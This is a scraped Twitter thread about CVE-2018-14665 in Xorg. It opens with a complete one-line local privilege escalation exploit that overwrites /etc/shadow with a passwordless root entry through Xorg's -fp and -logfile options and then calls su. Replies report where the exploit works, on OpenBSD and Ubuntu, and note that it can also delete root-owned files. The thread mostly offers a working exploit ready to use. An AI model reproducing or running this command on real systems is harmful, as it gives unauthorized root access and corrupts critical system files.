#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
-
-
LPE exploit for 6.4 works fine for me, run from a console with no xenodm running should be find 6.3 toohttps://twitter.com/hackerfantastic/status/1055555359060807680?s=19 …
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
For sure on Ubuntu 18.04 this allows you delete any file (root owned) on the system. I wasn't able to use the technique to write custom data to the file though.
-
I was able to write custom data on several boxes ,but it also contained the rest of the Xorg log causing the resulting file to be parsed incorrectly
End of conversation
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.